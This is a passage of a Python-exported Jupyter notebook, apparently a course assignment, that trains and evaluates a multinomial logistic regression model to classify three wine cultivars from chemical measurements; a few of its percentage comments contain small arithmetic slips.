chemical composition of 13 constituents found in each of the three types of grape\n# \n\n# In[ ]:\n\n\n# Data Required (We need to have data related to charateristics based on which a particular class is assigned to train our model)\n\n\n# # Question2. What are some of preliminary decisions you may need to make based on your problem statement? Your answer should include identification of an initial machine learning algorithm you will apply with respect to the problem statement in (1). Justification should be based on identification of the category of machine learning (supervised, unsupervised, etc.) as well as suggested machine learning algorithm from within the identified machine learning category. \n\n# ## The business problem we are trying to solve is predicting the type of wine where we are dealing with labeled data.(Cultivar) \n# \n\n# # Identification of the category of Machine Learning\n\n# ## As we have a classified data where there is a target class(Cultivar) and some characteristics based on which this target is classified, we need to train the model to perform same process \n\n# ## The category of machine learning which deals with labeled data is Supervised Learning \n# \n\n# ## In Supervised learning both input features and target variable are available for each training data. A supervised learning algorithm then tries to learn the relationship between the input and output variables from the data, so that when input x is given, it is able to produce the corresponding output y. And to do so, the algorithm iterates the training data to adjust the parameters of a model, until it could generalize the data. This is called the learning process. \n# \n\n# ## As we are trying to determine(predict) the category of grape which is a labeled variable we need to choose between the sub division of Supervised Learning \n# ## Regression and Classification\n# ## Regression is used when the target variable is numeric and continuous \n# ## Classification is used when the target variable is categorical \n# ## Our problem has target variable as categorical type (Type of grape) \n\n# ## So under the types of supervised learning algorithms we would eliminate the choice of Linear Regression as it deals with continuous variables \n\n# ## We need to choose from the further available alogorithms Logistic Regression, Decision Tree and Random Forest\n\n# # Identification of the category of Machine Learning Algorithm \n\n# ## While all three of the remaining algorithms are applicable to achieve the objective, we will start with Logistic Regression.\n\n# ## The time consumed and complexity of logistic regression model is less when compared to Decision Trees and Random Forests. As there will be creation a multiple branches or if else loops created in case of Decision trees and random forests resulting more time consumption for training the model \n\n# ## As there are three different categories in the target variable so we choose Multinomial Logistic Regression which classifies based on one versus rest method\n\n# ### In Multi-class logistic regression creates different groups using one versus ret methodology, \n# ### For example Cultivar1 class the outputs are considered as 1,-1,-1 for Cultivar1, Cultivar2, Cultivar3 respectively \n# ### In case of Cultivar2 class the outputs are considered as -1,1,-1 for Cultivar1, Cultivar2, Cultivar3 respectively\n# ### Similarly for Cultivar3 is as -1,-1,1 for Cultivar1, Cultivar2, Cultivar3 respectively\n# ### So after this the first model is created as M1 based on input features and the first column outputs for example from above conditions 1,-1,-1 and \n# ### this model(M1) will be able to predict if the output is Cultivar1 or not\n# ### Similarly M2 model will be created for Cultivar2 as output\n# ### Similarly M3 model will be created for Cultivar3 as output\n\n# ### when test data is given then the output would be calculated from three model M1, M2, M3 (probabilities as otputs)\n# ### Were sum of the three probabilites is equal to 1\n# ### For generation og prediction the array of three probabilities is considered and the one with highest probability is considered to be the prediction output\n# ### So if the output probabilities are [0.25, 0.25, 0.5] the output would be Cultivar3\n\n# In[2]:\n\n\n#Loading the pandas library\nimport pandas as pd\n\n\n# In[3]:\n\n\n#Loading the numpy library\nimport numpy as np\n\n\n# In[4]:\n\n\n#Loading sklearn for machine learning packages\nimport sklearn\n\n\n# In[5]:\n\n\n## importing the wine dataset with pandas\nWine_DF = pd.read_csv('D://wine.csv', header=0, sep=',')\n\n\n# In[6]:\n\n\n#Seeing the shape of the dataset\nprint(\"Shape of the data contained in wine.csv is\", Wine_DF.shape)\n#178 observations and 14 columns\n\n\n# ## The dataset has 178 observations and 14 columns \n\n# In[148]:\n\n\n#As it is a classification problem by using pairplot we can see three different classes classified based on the Cultivar\nimport seaborn as sns\nsns.pairplot(Wine_DF, hue = 'Cultivar', palette=\"husl\")\n\n\n# In[8]:\n\n\n#From the graph above we can see that the data is not hugely overlapping between so we can use the Logistic Regression model for our classification problem\n\n\n# In[9]:\n\n\n#Looking at the features\nWine_Features = Wine_DF.columns\nprint(\"The features (or attributes) recorded are :\", Wine_Features)\n\n\n# ## The 13 chemical characteristics of wines are 'Cultivar', 'Alcohol', 'MalicAcid', 'Ash', 'Alkalinity', 'Magnesium','Phenols', 'Flavanoids', 'NonFlavanoids', 'Pcyanins', 'ColorIntensity','Hue', 'OD280', 'Proline' \n\n# In[10]:\n\n\n#Displaying the datatypes of each column\nWine_DF.info()\n\n\n# # 3.\tKeeping your preliminary decisions from (2) in mind, peruse the dataset to:\n# # a. Display the datatype of each of the 14 columns to determine if any of the columns need to be transformed to comply with the requirements of your chosen algorithm. Specify the names of columns that require transformation along with the transformation that need to be performed. Include a reasonable explanation as to why the columns need to be transformed as well as what appropriate transformation will be necessary to make the feature algorithm-compliant.\n# \n\n# In[11]:\n\n\n#Displaying the datatypes of the 14 columns\nWine_DF.dtypes\n\n\n# ## The dataset has all the features in numeric type and only the label variable Cultivar in object type \n\n# ## As the label column has object datatype converting it into its actual data type \n\n# In[12]:\n\n\n#Converting Cultivar dataframe to display actual datatypes\nWine_DF = Wine_DF.convert_dtypes()\n\n\n# In[13]:\n\n\n#After conversion looking at the datatypes\nWine_DF.dtypes\n\n\n# ## Logistic Regression requires that variables (feature and target) all need to be numeric (int, double, or float). Target field(Cultivar) in our dataset is of string datatype. Therefore, we will need to convert the variables into their numeric representations.\n# ### Label variable, Cultivar, is categorical with three categories. So, all we need to do is convert Cultivar1, Cultivar2, Cultivar3 values into appropriate numeric values such as 0/1/2 - This can be handled easily with Sklearn's Label Encoding function.\n\n# In[14]:\n\n\n#Transforming the target variable to numeric type for further analysis\n\n\n# In[15]:\n\n\nfrom sklearn.preprocessing import LabelEncoder\n#Creating an instance of the LabelEncoder class\nlabel_encode = LabelEncoder() \n#Apply the label_encode to fit_transform the Cultivar column, by creating a new column named 'Cultivar_Type'\nWine_DF['Cultivar_Type'] = label_encode.fit_transform(Wine_DF['Cultivar'])\n\n\n# In[16]:\n\n\n#Label Encoder acts as a mapping function or String Indexer and generates corresponding numbers to the string value\n\n\n# In[17]:\n\n\n#Looking at data after encoding\nWine_DF.dtypes\n\n\n# ## b.Identify any other data cleanup and pre-processing that may be required to get the data ready for your chosen machine learning algorithm. This may include handling missing values. Missing values for any feature are to be replaced with a median value for that feature. State so if missing values are not indicated.\n\n# In[18]:\n\n\n#Checking for null values\nWine_DF.isnull().sum()\n\n\n# ## No null values or missing values are present in the data, so no replacement of values is needed \n\n# In[19]:\n\n\n#target Class distribution\nWine_DF.groupby(['Cultivar']).size()\n\n\n# In[20]:\n\n\n#Label Encoded column distribution\nWine_DF.groupby(['Cultivar_Type']).size()\n\n\n# In[21]:\n\n\n################################################################################\n#Number of Cultivar1 type in training data are (59) -- (59/178)-- 33.14%\n#Number of Cultivar2 type in training data are (48) -- (71/115)-- 39.88% \n#Number of Cultivar3 type in training data are (48) -- (48/115)-- 26.96%\n#Fairly balaced\n\n\n# ## From above size of function we can see there is a mis balance in our data as there are more records of Cultivar type2(Cultivar_Code-1(71) \n\n# ## We have a an unbalanced dataset which means that when the model is trained, it is going to learn more from Cultivar2. This will create bias that may come in when the dataset is not balanced. The bias comes since the model is trained with more samples of one case than the other. This may lead the model to predict more one case over another, thus mispredicting some values of the other case.So we have two options to balance the data. One is to eliminate the excess number of samples from the class that has a higher number of samples (if and only if this does not reduce theoverall dataset size significantly) or add samples of category with lower number. \n\n# ## So, we chose to eliminate the excess number of samples from the class that has a higher number of samples Cultivar1 type 0 and Cultivar1 1 \n\n# ## We have a fairly balanced dataset as it does not have huge imbalance in the distribution of Cultivar Types and also due less amount of data.We prefer using all data for training the model rather than elminating few data as the model needs to learn enough from the data to make correct predictions \n\n# In[22]:\n\n\n#So, if we chose to eliminate the excess number of samples from the class that has a higher number of samples Cultivar1 type 0 and Cultivar2 1\n#Type_0 = len(Wine_DF[Wine_DF['Cultivar_Code']==0])\n#Type_1 = len(Wine_DF[Wine_DF['Cultivar_Code']==1])\n#Type_2 = len(Wine_DF[Wine_DF['Cultivar_Code']==2])\n#Balanced_Wine_DF = pd.concat( [Wine_DF[Wine_DF['Cultivar_Code']==0].sample(Type_2) ,Wine_DF[Wine_DF['Cultivar_Code']==1].sample(Type_2), Wine_DF[Wine_DF['Cultivar_Code']==2]])\n#print(len(Balanced_Wine_DF))\n\n\n# In[23]:\n\n\n#Balanced_Wine_DF \n\n\n# In[24]:\n\n\n#Balanced_Wine_DF.groupby('Cultivar_Code').size()\n\n\n# In[25]:\n\n\n#Looking at the balanced data\n#Balanced_Wine_DF.head() \n#Using above code all the cultivars would be balance to 48 whic is type 3 count\n\n\n# In[26]:\n\n\nModel_DF = Wine_DF[['Alcohol','MalicAcid','Ash','Alkalinity','Magnesium','Phenols','Flavanoids','NonFlavanoids','Pcyanins','ColorIntensity','Hue','OD280','Proline','Cultivar_Type']]\n\n\n# In[27]:\n\n\nModel_DF.head() \n\n\n# In[28]:\n\n\n#Interpreting the distribution(balance) of data visually\nimport pandas.util.testing as tm\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.countplot(x = 'Cultivar_Type', data = Model_DF , palette = \"husl\")\nplt.show()\n#Around 60 is the count of type 0\n##Around 70 is the count of type 1\n#Around 50 is the count of type 2\n\n\n# # 4.\tPerform preliminary exploratory data analysis (EDA) pertinent to the problem statement and your chosen machine learning algorithm in (2). This may include basic statistics, data shape, grouping on the outcome variable, generating scatter plots or line plots, etc. as appropriate based on your chosen algorithm. Anything that can give you further insight into your dataset vis-à-vis the machine learning algorithm you have selected should be included with an explanation/conclusion of the output.\n\n# In[29]:\n\n\n#Exploratory Data Analysis\n\n\n# In[30]:\n\n\nModel_DF.describe()\n\n\n# In[31]:\n\n\n#The same count number in all the columns indicate every column has same number of values and no presence of missing values\n#From min value we can see no column in the has zero values \n#From max value we can understand the highest value of each chemical constituent(feature or column)\n\n\n# # Let us understand each column with respect to its statistics with our three Cultivar types \n\n# In[32]:\n\n\n#Considering statistics of Alcohol we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Alcohol'].describe()\n\n\n# ## Alcohol \n# ## Cultivar1 Cultivar2 Cultivar3 \n# \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 13.744746 12.278732 13.153750\n# #Minimum 12.85 11.03 12.20\n# #Max 14.83 13.86 14.34 \n\n# In[33]:\n\n\n#Lets see individual correlation of alcohol with our label Cultivar_Type(It wouldnt be highly correlated as there is no significant variation in the values for each type as seen above)\nModel_DF[['Cultivar_Type','Alcohol']].corr()\n\n\n# In[34]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Alcohol\",data=Model_DF)\n\n\n# In[35]:\n\n\n#Almost three types are having nearly same spread of datapoints related to alcohol due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[36]:\n\n\n#Considering statistics of MalicAcid we can understand the following details \nModel_DF.groupby('Cultivar_Type')['MalicAcid'].describe()\n\n\n# ## MalicAcid \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 2.010678 1.932676 3.333750\n# #Minimum 1.35 0.74 1.24\n# #Max 4.04 5.80 5.65 \n\n# In[37]:\n\n\n#Lets see individual correlation of MalicAcid with our label Cultivar_Type\nModel_DF[['Cultivar_Type','MalicAcid']].corr()\n\n\n# In[38]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"MalicAcid\",data=Model_DF)\n\n\n# In[39]:\n\n\n#Almost three types are having nearly same spread of datapoints related to Malicacid due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[40]:\n\n\n#Considering statistics of Ash we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Ash'].describe()\n\n\n# ## Ash \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 2.455593 2.244789 2.437083\n# #Minimum 2.04 1.36 2.10\n# #Max 3.22 3.23 2.86 \n\n# In[41]:\n\n\n#Lets see individual correlation of Ash with our label Cultivar_Type(It wouldnt be much as there is no significant variation in the values for each type as seen above)\nModel_DF[['Cultivar_Type','Ash']].corr()\n\n\n# In[42]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Ash\",data=Model_DF)\n\n\n# In[43]:\n\n\n#Almost three types are having nearly same spread of datapoints related to Ash due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[44]:\n\n\n#Considering statistics of Alkalinity we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Alkalinity'].describe()\n\n\n# ## Alkalinity \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 17.037288 20.238028 21.416667(significant variation)\n# #Minimum 11.2 10.6 17.5 (significant variation)\n# #Max 25.0 30.0 27.0 (significant variation) \n\n# In[45]:\n\n\n#Lets see individual correlation of Alkalinity with our label Cultivar_Type(It wouldnt be much as there is no significant variation in the values for each type as seen above)\nModel_DF[['Cultivar_Type','Alkalinity']].corr()\n\n\n# In[46]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Alkalinity\",data=Model_DF)\n\n\n# In[47]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to alkalinity due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[48]:\n\n\n#Considering statistics of Alkalinity we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Magnesium'].describe()\n\n\n# ## Magnesium \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 106.338983 94.549296 99.312500\n# #Minimum 89.0 70.0 80.0 \n# #Max 132.0 162.0 123.0 \n\n# In[49]:\n\n\n#Lets see individual correlation of Magnesium with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Magnesium']].corr()\n\n\n# In[50]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Magnesium\",data=Model_DF)\n\n\n# In[51]:\n\n\n#Almost three types are having nearly same spread of datapoints related to Magnesium due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[52]:\n\n\n#Considering statistics of Phenols we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Phenols'].describe()\n\n\n# ## Phenols \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 2.840169 2.258873 1.678750 (significant variation)\n# #Minimum 2.20 1.10 0.98 (significant variation)\n# #Max 3.88 3.52 2.80 (significant variation) \n\n# In[53]:\n\n\n#Lets see individual correlation of Phenols with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Phenols']].corr()\n\n\n# In[54]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Phenols\",data=Model_DF)\n\n\n# In[55]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to phenols due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[56]:\n\n\n#Considering statistics of Flavanoids we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Flavanoids'].describe()\n\n\n# ## Flavanoids \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 2.982373 2.080845 0.781458(significant variation)\n# #Minimum 2.19 0.57 0.34 (significant variation) \n# #Max 3.93 5.08 1.57 (significant variation) \n\n# In[57]:\n\n\n#Lets see individual correlation of Flavanoids with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Flavanoids']].corr()\n\n\n# In[58]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Flavanoids\",data=Model_DF)\n\n\n# In[59]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to Flavanoids due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[60]:\n\n\n#Considering statistics of NonFlavanoids we can understand the following details \nModel_DF.groupby('Cultivar_Type')['NonFlavanoids'].describe()\n\n\n# ## NonFlavanoids \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 0.290000 0.363662 0.447500(significant variation)\n# #Minimum 0.17 0.13 0.17 (significant variation)\n# #Max 0.50 0.66 0.63 (significant variation) \n\n# In[61]:\n\n\n#Lets see individual correlation of NonFlavanoids with our label Cultivar_Type\nModel_DF[['Cultivar_Type','NonFlavanoids']].corr()\n\n\n# In[62]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"NonFlavanoids\",data=Model_DF)\n\n\n# In[63]:\n\n\n#Almost three types are having nearly same spread of datapoints related to NonFlavanods due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[64]:\n\n\n#Considering statistics of Pcyanins we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Pcyanins'].describe()\n\n\n# ## Pcyanins \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 1.899322 1.630282 1.153542\n# #Minimum 1.25 0.41 0.55 \n# #Max 2.96 3.58 2.70 \n\n# In[65]:\n\n\n#Lets see individual correlation of Pcyanins with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Pcyanins']].corr()\n\n\n# In[66]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Pcyanins\",data=Model_DF)\n\n\n# In[67]:\n\n\n#Almost three types are having nearly same spread of datapoints related to Pcyanins due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[68]:\n\n\n#Considering statistics of ColorIntensity we can understand the following details \nModel_DF.groupby('Cultivar_Type')['ColorIntensity'].describe()\n\n\n# ## ColorIntensity \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 5.528305 3.086620 7.396250\n# #Minimum 3.52 1.28 3.85 \n# #Max 8.9 6.0 13.0 \n\n# In[69]:\n\n\n#Lets see individual correlation of ColorIntensity with our label Cultivar_Type\nModel_DF[['Cultivar_Type','ColorIntensity']].corr()\n\n\n# In[70]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"ColorIntensity\",data=Model_DF)\n\n\n# In[71]:\n\n\n#Almost three types are having nearly same spread of datapoints related to ColorIntensity due to which the feature is not highly significant in differentiating between the CultivarTypes\n\n\n# In[72]:\n\n\n#Considering statistics of Hue we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Hue'].describe()\n\n\n# ## Hue \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 1.062034 1.056282 0.682708(significant variation)\n# #Minimum 0.82 0.69 0.48 (significant variation)\n# #Max 1.28 1.71 0.96 (significant variation) \n\n# In[73]:\n\n\n#Lets see individual correlation of Hue with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Hue']].corr()\n\n\n# In[74]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Hue\",data=Model_DF)\n\n\n# In[75]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to Hue due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[76]:\n\n\n#Considering statistics of OD280 we can understand the following details \nModel_DF.groupby('Cultivar_Type')['OD280'].describe()\n\n\n# ## OD280 \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 3.157797 2.785352 1.683542(significant variation)\n# #Minimum 2.51 1.59 1.27 (significant variation)\n# #Max 4.00 3.69 2.47 (significant variation) \n\n# In[77]:\n\n\n#Lets see individual correlation of OD280 with our label Cultivar_Type\nModel_DF[['Cultivar_Type','OD280']].corr()\n\n\n# In[78]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"OD280\",data=Model_DF)\n\n\n# In[79]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to OD280 due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[80]:\n\n\n#Considering statistics of Proline we can understand the following details \nModel_DF.groupby('Cultivar_Type')['Proline'].describe()\n\n\n# ## Proline \n# ## Cultivar1 Cultivar2 Cultivar3 \n\n# ## \n# Cultivar1 Cultivar2 Cultivar3 \n# #No.of values 59 71 48\n# #Average value 1115.711864 519.507042 629.895833(significant variation)\n# #Minimum 680.0 278.0 415.0 (significant variation)\n# #Max 1680.0 985.0 880.0 (significant variation) \n\n# In[81]:\n\n\n#Lets see individual correlation of Proline with our label Cultivar_Type\nModel_DF[['Cultivar_Type','Proline']].corr()\n\n\n# In[82]:\n\n\n#Visualizing the spread\nsns.catplot(x=\"Cultivar_Type\", y=\"Proline\",data=Model_DF)\n\n\n# In[83]:\n\n\n#The three types are having different spread of datapoints(highest value,lowest values) related to Proline due to which the feature could be significant in differentiating between the CultivarTypes\n\n\n# In[ ]:\n\n\n\n\n\n# In[84]:\n\n\n#sns.catplot(x=\"Cultivar_Type\", y=\"Alcohol\", kind=\"box\",data=Model_DF.sort_values(\"Cultivar_Type\"))\n\n\n# In[85]:\n\n\n#sns.catplot(x=\"Cultivar_Type\", y=\"Alcohol\", hue=\"Cultivar_Type\", kind=\"box\", data=Model_DF);\n\n\n# In[86]:\n\n\n#Checking the correlation of each feature with target variable by observing the last column in heat map\n\n\n# In[87]:\n\n\nSelected_features = ['Alcohol','MalicAcid','Ash','Alkalinity','Magnesium','Phenols','Flavanoids','NonFlavanoids','Pcyanins','ColorIntensity','Hue','OD280','Proline','Cultivar_Type']\nX = Model_DF[Selected_features]\n\nplt.subplots(figsize=(10, 10))\nsns.heatmap(X.corr(), annot=True, cmap=\"RdYlGn\")\nplt.show()\n\n\n# ## We can see that six features are highly correlated above positive (0.5) - 1 and above negative (0.5) -5 \n\n# In[88]:\n\n\n#On the basis of individual correlation coefficients, we are determining which independent variables are useful in predicting the target value \n#Correlation coefficient value ranges from -1 to +1; closer to 1, stronger the relationship. \n#Also, only correlation coefficients greater than 0.5 in magnitude are considered for further inclusion in the model.\n#These variables are considered relevant attributes for prediction of Cultivar Type.\n\n\n# In[89]:\n\n\n#For more clear values lets see correlation matrix instead of heatmap\n\n\n# In[90]:\n\n\nModel_DF.corr()\n\n\n# ## Flavonoids is the first high negatively correlated value: -0.847498 \n# ## OD280 is the second high negatively correlated value: -0.788230 \n# ## Phenols is the third high negatively correlated value: -0.719163 \n# ## Hue is the fourth high negatively correlated value: -0.617369 \n# ## Proline is the fifth high negatively correlated value: -0.633717 \n# ## Alkalinity is the sixth positively correlated value: 0.517859 \n# \n\n# In[91]:\n\n\n#Checking the distribution again\nModel_DF.groupby(['Cultivar_Type']).size()\n\n\n# In[92]:\n\n\nModel_DF.head()\n\n\n# ## Considering only highly correlated features Flavanoids,OD280,Phenols,Hue,Proline,Alkalinity for training and testing the model \n\n# In[93]:\n\n\nWine_Corr_features_DF = Model_DF[['Alkalinity','Phenols','Flavanoids','Hue','OD280','Proline']]\n\n\n# In[94]:\n\n\n#Input data to model (features)\nWine_Corr_features_DF.head()\n\n\n# In[95]:\n\n\nWine_Target_DF = Model_DF['Cultivar_Type']\n\n\n# In[96]:\n\n\n#Label data to model (target variable)\nWine_Target_DF.head()\n\n\n# ## Question5.\tIf your chosen algorithm demands training and test datasets, split your wine dataset using an 80/20 split. If dataset is split, evaluate your training and test datasets to ensure they are representative of your full data set. \n\n# ## To Train and Test the Logistic Regression Model, split dataset 80-20%\n\n# In[97]:\n\n\n#Importing the train test split function from sklearn\nfrom sklearn.model_selection import train_test_split\n\n\n# In[98]:\n\n\n#Splitting the data\nX_train, X_test, Y_train, Y_test = train_test_split(Wine_Corr_features_DF,Wine_Target_DF, test_size=0.20, random_state = 1)\n\n\n# In[99]:\n\n\n#Loking at train data\nX_train\n\n\n# In[100]:\n\n\n#Checking the shape of all splits\nX_train.shape, Y_train.shape, X_test.shape, Y_test.shape\n\n\n# In[101]:\n\n\n# Get a tuple of unique values & their frequency in numpy array for trainig data\nuniqueValues, occurCount = np.unique(Y_train, return_counts=True)\n \nprint(\"Unique Values : \" , uniqueValues)\nprint(\"Occurrence Count : \", occurCount)\n\n\n# In[102]:\n\n\n#Total records split for training is 142\n#Number of Cultivar1 type in training data are (45) -- (45/142)-- 31.69%\n#Number of Cultivar2 type in training data are (58) -- (58/142)-- 40.84% \n#Number of Cultivar3 type in training data are (39) -- (39/142)-- 27.46%\n################################################################################\n#Number of Cultivar1 type in training data are (59) -- (59/178)-- 33.14%\n#Number of Cultivar2 type in training data are (71) -- (71/115)-- 39.88% \n#Number of Cultivar3 type in training data are (48) -- (48/115)-- 26.96%\n\n\n# In[103]:\n\n\n#displaying training datasets\nprint(X_train,Y_train)\n\n\n# In[104]:\n\n\n# Get a tuple of unique values & their frequency in numpy array for testing data\nuniqueValues, occurCount = np.unique(Y_test, return_counts=True)\n \nprint(\"Unique Values : \" , uniqueValues)\nprint(\"Occurrence Count : \", occurCount)\n\n\n# In[105]:\n\n\n#Total records split for testing is 36\n#Number of Cultivar1 type in training data are (14) -- (14/36)-- 38.88%\n#Number of Cultivar2 type in training data are (13) -- (13/36)-- 36.11% \n#Number of Cultivar3 type in training data are (9) -- (9/36)-- 25.00%\n################################################################################\n#Number of Cultivar1 type in training data are (59) -- (59/178)-- 33.14%\n#Number of Cultivar2 type in training data are (71) -- (71/178)-- 39.88% \n#Number of Cultivar3 type in training data are (48) -- (48/178)-- 26.96%\n\n\n# ## Total records split for training is 142\n# \n# ### Number of Cultivar1 type in training data are (45) -- (45/142)-- 31.69%\n# ### Number of Cultivar2 type in training data are (58) -- (58/142)-- 40.84%\n# ### Number of Cultivar3 type in training data are (39) -- (39/142)-- 27.46%\n# \n# ## Total records split for testing is 36\n# ### Number of Cultivar1 type in training data are (14) -- (14/36)-- 38.88%\n# ### Number of Cultivar2 type in training data are (58) -- (13/36)-- 36.11%\n# ### Number of Cultivar3 type in training data are (39) -- (9/136)-- 25.00%\n# \n# ## Overall records are 178 \n# ### Number of Cultivar1 type in training data are (59) -- (59/178)-- 33.14%\n# ### Number of Cultivar2 type in training data are (71) -- (71/115)-- 39.88%\n# ### Number of Cultivar3 type in training data are (48) -- (48/115)-- 26.96%\n# \n# # The training dataset split is representative of overall data as there is only 1 or 2 percents split variation compared to percentages of overall data \n# # The testing dataset split is also slightly representative of overall data as there is 4 or 5 percents split variation compared to percentages of overall data\n\n# In[106]:\n\n\n#Import Logistic regression from SKLearn Libraries\nfrom sklearn.linear_model import LogisticRegression\n\n\n# # Question6.Use the relevant portion of your dataset to train the model of your selected machine learning algorithm. Do all the necessary preprocessing to determine the parameters for your selected algorithm. For example, you will need to specify (and justify) the number of clusters if you choose to use KMeans clustering algorithm via the Elbow curve, Silhouette analysis, etc. \n\n# In[107]:\n\n\n#Creting an instance of Logistic regression using multi_class function\nlog_reg = LogisticRegression(solver='newton-cg',multi_class='multinomial')\n#Applying training data to the model\nlog_reg.fit(X_train,Y_train)\n\n\n# In[108]:\n\n\n#Generating training predictions\n\n\n# In[109]:\n\n\n#Generate predictions to evaluate the trained model using X_Train data. \nYtrain_predict = log_reg.predict(X_train)\n\n\n# In[110]:\n\n\n# Our resulting Y_predict variable is of shape (142,). so, it needs to be converted to (142,1) 2-D array\n# to a new result dataframe\npredict_ytrain = Ytrain_predict.reshape(-1,1)\nprint(predict_ytrain.shape)\n\n\n# In[111]:\n\n\n# The Y_train contains values of our target variable (Cultivar). There were 142 records in the training data. So, Y_train\n# has a shape of (142,) - one dimesional. We'll need to reshape this into 2-D (142 rows, 1 column of Y-values)\n\ntrain_y = (Y_train.values).reshape(-1,1)\nprint(train_y.shape)\nprint(train_y.size)\n\n\n# In[112]:\n\n\n# We need to obtain probabilities for our predictions. For this, we need to use predict_proba() function of the \n# logistic regression model we instantiated earlier during model training and predictions. \n\ntrain_predicted_probs = log_reg.predict_proba(X_train)\nprint(train_predicted_probs)\n\n\n# # As mentioned the output of the multicalss logistic regression is set of probabilities based on which the predictions are generated\n\n# In[113]:\n\n\n#Finally, we add all five variables into a Pandas Dataframe for display purposes. \n\nnp.set_printoptions(suppress=True) # this is to prevent small values being displayed in scientific notations\n\ntrain_prob_results_df = pd.DataFrame(train_predicted_probs)\ntrain_prob_results_df[\"Predicted\"] = predict_ytrain\ntrain_prob_results_df[\"Actual\"] = train_y\ntrain_prob_results_df.head(10)\n\n\n# # 7.Using appropriate metrics for your chosen algorithm, evaluate the trained model. Explain and justify the worthiness of your trained model. \n\n# In[114]:\n\n\n# Let's evaluate the trained model based on predictions generated above\n\nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\n\nprint(classification_report(train_y,predict_ytrain))\n\n\n# In[115]:\n\n\nconf_matrix = metrics.confusion_matrix(train_y,predict_ytrain)\nconf_matrix\n\n\n# In[116]:\n\n\nprint(\"Accuracy:\",metrics.accuracy_score(train_y,predict_ytrain))\n\n\n# In[117]:\n\n\nprint(\"Precision:\",metrics.precision_score(train_y,predict_ytrain, average = \"macro\"))\nprint(\"Recall:\",metrics.recall_score(train_y,predict_ytrain,average = \"macro\"))\n\n\n# In[118]:\n\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelBinarizer\ndef multiclass_roc_auc_score(y_test, y_pred, average=\"macro\"):\n lb = LabelBinarizer()\n lb.fit(y_test)\n y_test = lb.transform(y_test)\n y_pred = lb.transform(y_pred)\n return roc_auc_score(y_test, y_pred, average=average)\nauc = multiclass_roc_auc_score(train_y,predict_ytrain, average=\"macro\")\nprint(\"Area under curve : \", 